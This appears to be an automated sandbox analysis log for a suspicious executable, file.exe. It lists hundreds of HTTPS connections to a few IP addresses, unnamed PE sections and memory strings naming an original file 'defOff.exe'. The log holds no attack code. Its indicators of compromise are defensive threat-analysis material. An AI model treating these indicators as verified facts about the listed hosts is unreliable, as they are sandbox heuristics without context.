          Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
          Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50009
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50008
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
          Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
          Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50024 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50009 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50023 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50018
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50017
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50019
          Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50010
          Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50012
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50011
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50014
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50013
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50016
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50015
          Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50021
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50020
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50023
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50024
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50027
          Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50026
          Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50021 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50011 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50018 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50020 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50006 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
          Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
          Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
          Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
          Source: unknownNetwork traffic detected: HTTP traffic on port 50019 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
          Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
          Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
          Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.5:49714 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49723 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.195.62.26:443 -> 192.168.2.5:49784 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.195.62.26:443 -> 192.168.2.5:49790 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.5:49851 version: TLS 1.2

          System Summary

          barindex
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: file.exeStatic PE information: section name:
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F54740_3_007F5474
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F54740_3_007F5474
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FCD0_3_007F4FCD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FCD0_3_007F4FCD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F54740_3_007F5474
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F54740_3_007F5474
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FCD0_3_007F4FCD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FCD0_3_007F4FCD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FCD0_3_007F4FCD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FCD0_3_007F4FCD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FCD0_3_007F4FCD
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_007F4FCD0_3_007F4FCD
          Source: file.exe, 00000000.00000003.2311683687.0000000005902000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2324729294.00000000059A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2307695863.00000000058F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2314732703.0000000005921000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2319012718.000000000595D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2324552814.000000000585C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2323887922.000000000585B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000002.2453083960.0000000005DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2320693240.0000000005967000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2315050501.00000000059DD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2307114441.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2312263856.0000000005853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2319747621.0000000005A65000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2354275936.000000000542E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2354275936.000000000542E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
          Source: file.exe, 00000000.00000003.2322065249.0000000005987000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2307229603.00000000054B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2315680909.0000000005929000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2360122953.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
          Source: file.exe, 00000000.00000003.2441108672.0000000005439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
          Source: file.exe, 00000000.00000003.2365071633.0000000005439000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
          Source: file.exe, 00000000.00000003.2318130258.0000000005948000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2320986995.0000000005861000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2313903958.0000000005904000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2324390946.0000000005993000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2306866995.0000000005855000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2307799769.00000000059A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2314152753.0000000005909000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2322773791.0000000005982000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2322992372.0000000005855000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2318292041.0000000005A45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2320358308.0000000005968000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2317049648.000000000593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2324202413.0000000005854000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2316088695.00000000059FE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2316884529.0000000005855000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2324907696.0000000005AEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2320525007.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2317318246.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2323731463.000000000599E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2313270363.0000000005910000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2302663109.0000000005696000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2316197939.000000000585C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2317445609.000000000594F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2314030965.0000000005857000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2322322483.0000000005855000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2323276993.000000000598D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2315266540.0000000005929000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2318020490.0000000005853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2313735142.0000000005853000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2315368576.0000000005859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2302663109.00000000056DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2325837821.0000000005860000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2307944418.0000000005852000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2320244375.0000000005855000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2317173683.0000000005A2F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2309720907.00000000058F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2307583830.0000000005856000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2318463287.000000000585C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2317869398.0000000005A4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2324036122.000000000599A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
